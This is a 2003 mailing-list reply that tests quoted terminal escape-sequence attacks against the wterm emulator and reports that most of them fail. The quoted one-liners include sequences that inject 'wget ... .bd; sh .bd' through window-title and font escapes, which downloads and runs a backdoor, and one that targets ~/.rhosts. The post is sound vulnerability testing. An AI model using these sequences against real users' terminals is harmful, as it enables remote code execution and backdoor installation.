Re: Terminal Emulator Security Issues

[Juraj Ziegler <e () hq sk>]

Wterm was not mentioned throughout the article, so I decided to test it
quickly.

On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:o
> $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"

Does not work. Code 33 is not implemented, according to the
documentation, code 50 is used to change font [specifying movement in
the terminal's font list].

> $ echo -e "\e]2;This is the new window title\a"

Works.

> $ echo -e "\e[21t"

echo -e "\e]2;whoo\a"
echo -e "\e[21t"

Changes window title to 'whoo', but nothing is pasted -> does not work.

> $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

It can be deduced that this does not work either, and a quick test
proved it.

> $ echo -e "\eP0;0|0A/17\x9c"

Safe from this harm, over here.

> $  echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

Besides of a weird output from echo itself [as no all characters where
handled by the terminal], nothing.

The output is:  :]itd

As to wterm's origin, it seems to be based on rxvt
<quote site="http://largo.windowmaker.org/files.php#wterm";>
wterm started as a beta test of some additions Alfredo hoped to get
contributed to the official rxvt source tree.
</quote>

Version tested: 6.2.9 - latest (even though released in 8/2001)

[e]

-- 
_______________________________________________________________________________
> e () hq sk<                   /(bb|[^b]{2})/                 >http://hq.sk/~euro<
        "always know what you say, but do not always say what you know"

Attachment: _bin
Description: